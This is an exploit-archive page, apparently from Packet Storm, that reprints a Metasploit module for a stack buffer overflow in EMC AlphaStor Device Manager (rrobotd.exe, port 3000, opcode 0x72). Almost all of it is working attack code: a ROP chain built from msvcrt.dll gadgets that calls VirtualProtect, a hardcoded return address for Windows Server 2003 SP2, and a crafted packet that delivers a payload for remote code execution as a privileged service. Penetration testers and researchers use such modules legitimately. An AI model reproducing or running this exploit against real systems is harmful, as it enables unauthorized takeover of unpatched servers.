Exploit the possiblities

EMC AlphaStor Device Manager Opcode 0x72 Buffer Overflow

EMC AlphaStor Device Manager Opcode 0x72 Buffer Overflow
Posted Sep 14, 2017
Authored by James Fitts | Site metasploit.com

This Metasploit module exploits a stack based buffer overflow vulnerability found in EMC Alphastor Device Manager. The overflow is triggered when sending a specially crafted packet to the rrobotd.exe service listening on port 3000. During the copying of strings to the stack an unbounded sprintf() function overwrites the return pointer leading to remote code execution.

tags | exploit, remote, overflow, code execution
MD5 | da358008d9761bc06cd638d10f5502ed

EMC AlphaStor Device Manager Opcode 0x72 Buffer Overflow

Change Mirror Download
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'EMC AlphaStor Device Manager Opcode 0x72',
'Description' => %q{
This module exploits a stack based buffer overflow vulnerability
found in EMC Alphastor Device Manager. The overflow is triggered
when sending a specially crafted packet to the rrobotd.exe service
listening on port 3000. During the copying of strings to the stack
an unbounded sprintf() function overwrites the return pointer
leading to remote code execution.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', '0day' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 160,
'DisableNops' => 'true',
'BadChars' => "\x00\x09\x0a\x0d",
'StackAdjustment' => -404,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'Compat' =>
{
'ConnectionType' => '+ws2ord',
}
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows Server 2003 SP2 EN',
{
# pop eax/ retn
# msvcrt.dll
'Ret' => 0x77bc5d88,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 14 2013'))

register_options(
[
Opt::RPORT(3000)
], self.class )
end

def exploit
connect

# msvcrt.dll
# 96 bytes
rop = [
0x77bb2563, # pop eax/ retn
0x77ba1114, # ptr to kernel32!virtualprotect
0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn
0xfeedface,
0x77bb0c86, # xchg eax, esi/ retn
0x77bc9801, # pop ebp/ retn
0x77be2265,
0x77bb2563, # pop eax/ retn
0x03C0990F,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb48d3, # pop eax/ retn
0x77bf21e0,
0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn
0x77bbfc02, # pop ecx/ retn
0x77bef001,
0x77bd8c04, # pop edi/ retn
0x77bd8c05,
0x77bb2563, # pop eax/ retn
0x03c0984f,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb8285, # xchg eax, edx/ retn
0x77bb2563, # pop eax/ retn
0x90909090,
0x77be6591, # pushad/ add al, 0efh/ retn
].pack("V*")

buf = "\xcc" * 550
buf[246, 4] = [target.ret].pack('V')
buf[250, 4] = [0x77bf6f80].pack('V')
buf[254, rop.length] = rop
buf[350, payload.encoded.length] = payload.encoded

packet = "\x72#{buf}"

print_status("Trying target %s..." % target.name)

sock.put(packet)

handler
disconnect
end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    41 Files
  • 12
    Dec 12th
    44 Files
  • 13
    Dec 13th
    25 Files
  • 14
    Dec 14th
    15 Files
  • 15
    Dec 15th
    28 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close